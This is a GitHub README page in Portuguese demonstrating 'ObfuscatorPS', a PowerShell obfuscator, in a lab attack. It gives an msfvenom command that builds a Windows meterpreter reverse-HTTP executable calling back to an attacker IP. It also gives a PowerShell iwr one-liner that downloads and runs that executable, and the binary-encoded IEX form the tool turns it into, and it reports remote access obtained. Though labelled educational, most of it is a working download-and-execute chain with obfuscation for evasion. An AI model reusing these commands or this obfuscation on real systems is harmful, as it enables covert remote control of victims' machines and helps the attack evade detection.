Skip to content

Latest commit

 

History

History
97 lines (55 loc) · 2.44 KB

File metadata and controls

97 lines (55 loc) · 2.44 KB

🕶️ ObfuscatorPS - Demonstração de Uso

Exemplo prático de utilização do ObfuscatorPS em um cenário controlado para estudo de ofuscação.


📌 Visão Geral

Antes de tudo devemos ter informações cruciais:

  • IP das máquinas
  • Criação do payload com msfvenom
  • Uso do payload no msfconsole (msf6)
  • Download e execução do arquivo na máquina Windows

🧠 Passo 1: Criar o payload

Comando utilizado:

msfvenom -p windows/meterpreter/reverse_http LHOST=172.23.73.245 LPORT=4444 -f exe -o shell_reverso.exe

🧠 Passo 2: Configurar o listener

Abrir o msfconsole e usar o payload:

🎯 Isca pronta.


🧠 Passo 3: Uso do ObfuscatorPS

Comando original:

iwr -Uri http://172.23.73.245/shell_reverso.exe -Outfile shell_reverso.exe; .\shell_reverso.exe

Comando utilizado:

.\obfuscator.ps1 -comand "iwr -Uri http://172.23.73.245/shell_reverso.exe -Outfile shell_reverso.exe; .\shell_reverso.exe" -type binary

Resultado:

Execução do comando:

function uYrp($z){$KAL="";foreach($sX in $z){$KAL+=[char][Convert]::ToInt32($sX,2)};return $KAL};IEX (...)

🧠 Passo 4: Verificação

Checkando o msfconsole:

Acesso obtido com sucesso.


✅ Conclusão

O ObfuscatorPS permite mascarar comandos mantendo sua execução, sendo útil para estudo de ofuscação.


⚠️ Aviso

Uso apenas para fins educacionais. Obs: Firewall desativado...


Usando o modo de Space

image image